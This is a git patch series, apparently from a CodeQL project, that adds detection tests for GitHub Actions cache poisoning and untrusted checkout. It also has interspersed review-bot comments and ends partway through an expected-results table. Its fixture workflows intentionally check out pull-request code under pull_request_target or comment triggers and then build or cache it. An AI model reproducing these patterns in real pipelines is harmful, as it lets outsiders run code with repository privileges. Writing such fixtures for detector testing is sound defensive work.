privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 878317ab6b28ecbdf2838a5ea393e223745a5db1 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:18:10 +0200 Subject: [PATCH 0351/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 761554c60e6..847a7b83e54 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.4 +version: 0.1.5 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9ccc911594f..be2b4e428c9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.4 +version: 0.1.5 groups: [actions, queries] suites: codeql-suites extractor: javascript From 76b115deb09da540e370ebdbf557d19a84dc41fb Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:44:44 +0200 Subject: [PATCH 0352/1267] Dedup Cache poisoning and Untrusted checkout --- ql/src/Security/CWE-349/CachePoisoning.ql | 3 +- .../CWE-349/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-349/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-349/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 57 +++++++++++++++++ .../CWE-829/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-829/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-829/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../CWE-829/.github/workflows/test.yml | 37 +++++++++++ .../UntrustedCheckoutCritical.expected | 60 +++++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 11 files changed, 528 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 2a9952ce07f..f202b1fcecf 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -41,7 +41,8 @@ where
 // the job writes to the cache
 // (No need to follow the checkout step as the cache writing is normally done after the job completes)
 j.getAStep() = s and
- s instanceof CacheWritingStep
+ s instanceof CacheWritingStep and
+ not s instanceof PoisonableStep
 or
 // the job executes checked-out code
 // (The cache specific token can be leaked even for non-privileged workflows)
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml
new file mode 100644
index 00000000000..6900c3bc23f
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml
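Review bot: The added `not s instanceof PoisonableStep` on the cache-writing disjunct has no comment, and the one above it (`// the job writes to the cache`) no longer describes the whole condition. Judging by the commit title, the exclusion is there so that a step matching both classes is reported once, by the `or` branch that follows. That branch's body is outside the hunk, so it is worth confirming it carries no extra constraint that would leave such a step unreported by either disjunct, which would be a silent false negative for the query. I would add `// steps that are also PoisonableStep are reported by the branch below; skipped here to avoid duplicate alerts` above the new line. The `where` clause begins and ends outside the hunk.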
@@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to 
GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml new file mode 100644 index 00000000000..5501beb9ea2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml 
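Review bot: The inherited comment `# Limit permissions of the GITHUB_TOKEN for untrusted code` on the `build` job reads as if the job were safe, but the CachePoisoning.expected change in this commit reports its `Build with Jekyll` step (poc.yml:38) with the PR-head checkout (poc.yml:30) as the source. The fixture exists to show that a read-only token does not keep a `pull_request_target` build of checked-out code from being flagged, so the file should say so, e.g. by appending `# fixture: CachePoisoning alert expected on the Jekyll build step despite the read-only token`. Appending at the end keeps the line numbers recorded in the .expected files valid. The byte-identical copy under CWE-829 (same blob id in its `index` line) would want an equivalent line for its own query.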
@@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml new file mode 100644 index 00000000000..4d5ae1f528c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml 
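Review bot: poc2.yml is added as a CachePoisoning fixture, but the CachePoisoning.expected hunks in this commit gain only `edges` rows for it and no `#select` row, and nothing in the file says whether that silence is intended. The job checks out `steps.branch-deploy.outputs.ref` on an `issue_comment` trigger and then runs `ruby/setup-ruby` with `bundler-cache: true`, which looks like the cache-writing-after-checkout pattern the query targets, so a reader cannot tell a deliberate negative from a missed detection. A trailing comment would settle it, e.g. `# fixture: no CachePoisoning alert expected because <reason>`; appending it rather than placing it at the top leaves the locations in the .expected file unchanged.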
@@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6a91d49c0ca..2580531afd3 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,4 +1,56 @@ edges +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| 
.github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| 
.github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | 
@@ -104,6 +156,11 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | #select +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the 
default branch | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml new file mode 100644 index 00000000000..6900c3bc23f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml 
@@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to 
GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml new file mode 100644 index 00000000000..5501beb9ea2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml 
@@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml new file mode 100644 index 00000000000..4d5ae1f528c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml 
@@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml new file mode 100644 index 00000000000..96fd8bdd1a4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml 
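Review bot: This fixture carries no comment saying which query result it is meant to pin, and the expectation files later in this patch list poc3.yml only under UntrustedCheckoutMedium. The `build-and-upload` job checks out `github.event.pull_request.head.ref` on `pull_request_target` and then runs `npm run build -w www` from that tree, yet UntrustedCheckoutCritical.expected gains only edge rows for poc3.yml and no alert row. If that is intended (possibly because the job is limited to `contents: read`), a header comment such as `# expected: UntrustedCheckoutMedium only, build job has contents: read` would record it. Otherwise this looks like a missed detection that deserves its own follow-up test.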
@@ -0,0 +1,37 @@ +name: Tests +on: + push: + branches: + - master + pull_request: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + codeql test run ql/test diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 29b311435dd..57efc8af35d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -198,6 +198,58 @@ edges | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | | .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| 
